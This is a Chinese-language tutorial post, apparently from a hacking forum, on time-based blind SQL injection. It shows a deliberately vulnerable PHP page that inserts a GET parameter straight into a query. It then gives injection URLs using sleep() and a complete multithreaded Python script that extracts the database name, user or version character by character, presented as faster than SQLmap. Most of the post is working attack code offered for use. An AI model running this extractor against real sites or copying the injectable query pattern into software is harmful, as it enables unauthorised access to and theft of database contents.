延时注入php演示源码
- <?php
- $link= mysql_connect("localhost","root","root");
- mysql_select_db("test",$link);
- $sql= "select name from cms where id='{$_GET['id']}'";
- echo $sql;
- mysql_query($sql);
- ?>
复制代码 获取数据库长度
http://www.nvhack.com/sql/sql.php?id=1' and if(length(database()) = 4, sleep(2),1)--+
开始判断数据库字符
http://www.nvhack.com/sql/sql.php?id=1' and if(ascii(substring(database(),1,1)) = 116, sleep(2),1)--+代码如下
- # -*- coding: utf-8 -*-
- import requests
- import threading
- import datetime
- # 公用函数获取数据库,版本,用户名的的长度,参数getType为,user(),database(),version(),
- length = 0
- def loadDataPublicLength(url,i,getType,afterstr):
- if isTrue(url + ' and if(length('+ getType +') = ' + str(i)+ ', sleep(2),1)'+afterstr):
- print('得到结果,长度为:'+ str(i))
- global length
- length = i
- getName()
- # 公用函数获取名字,参数getType为,user(),database(),version(),
- nameStr = {}
- def loadDataPublicName(url, i,getType,afterstr):
- min = 32
- max = 127
- while True:
- center = int((min + max) / 2)
- if isTrue(url + ' and if(ascii(substring('+ getType +',' + str(i) + ',1)) > ' + str(center) +', sleep(2),1)'+ afterstr):
- min = center
- continue
- if isTrue(url + ' and if(ascii(substring('+ getType +',' + str(i) + ',1)) < ' + str(center) +', sleep(2),1)'+ afterstr):
- max = center
- continue
- if isTrue(url + ' and if(ascii(substring('+ getType +',' + str(i) + ',1)) = ' + str(center) +', sleep(2),1)'+ afterstr):
- global nameStr
- nameStr[i-1]=chr(center)
- #print(nameStr)
- break
- print(nameStr.values())
- # 判断是否正确,如果正确返回true
- def isTrue(urlStr):
- print(urlStr)
- starttime = datetime.datetime.now() # 开始请求URL时间
- re = requests.get(urlStr).content.decode('utf8')
- endtime = datetime.datetime.now() # 请求完毕时间
- res = (endtime - starttime).seconds
- if int(res) >= 2:
- return True
- else:
- return False
- #################获取长度
- def getLength():
- threads1 = []
- for j in range(1,20):
- t = threading.Thread(target=loadDataPublicLength,args=(url,j,getType,afterstr,))
- threads1.append(t)
- for t1 in threads1:
- #t.setDaemon(True)
- t1.start()
- t1.join()
- ################获取名字的线程,线程数取决于获取数据的长度
- def getName():
- threads2 = []
- for j in range(1,length+1):
- t = threading.Thread(target=loadDataPublicName,args=(url,j,getType,afterstr,))
- threads2.append(t)
- for t2 in threads2:
- t2.start()
- t2.join()
- if __name__ == '__main__':
- url = 'http://www.nvhack.com/sql/sql.php?id=1\' ' # 延时注入报错网址
- afterstr = '--+' # 是否需要注释符号,不用为空
- getType = 'database()'
- getLength()
复制代码
# 获取长度仅需几秒
# 获取名字数据库名字,要比SQLmap快很多
|